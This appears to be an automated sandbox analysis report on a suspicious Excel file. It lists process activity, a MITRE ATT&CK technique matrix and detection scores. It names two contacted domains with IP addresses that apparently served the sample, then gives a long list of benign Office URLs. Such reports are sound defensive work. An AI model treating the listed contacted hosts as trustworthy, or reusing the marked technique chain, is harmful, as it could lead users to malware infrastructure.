Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: rundll32.exe, 00000004.00000002.375729153.0000000004600000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000004.00000002.375729153.0000000004600000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000004.00000002.375729153.0000000004600000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000004.00000002.375729153.0000000004600000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
46747509_by_Libranalysis.xls4%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
signifysystem.com0%VirustotalBrowse
fcventasyservicios.cl0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalseunknown
fcventasyservicios.cl
192.185.32.232
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
    high
    https://login.microsoftonline.com/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
      high
      https://shell.suite.office.com:144320723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
          high
          https://autodiscover-s.outlook.com/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
              high
              https://cdn.entity.20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                    high
                    https://powerlift.acompli.net20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v120723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                      high
                      https://cortana.ai20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                high
                                https://api.aadrm.com/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                      high
                                      https://cr.office.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                            high
                                            https://graph.ppe.windows.net20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                            high
                                                            https://graph.windows.net20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                high
                                                                                                https://api.office.net20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v220723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                              high
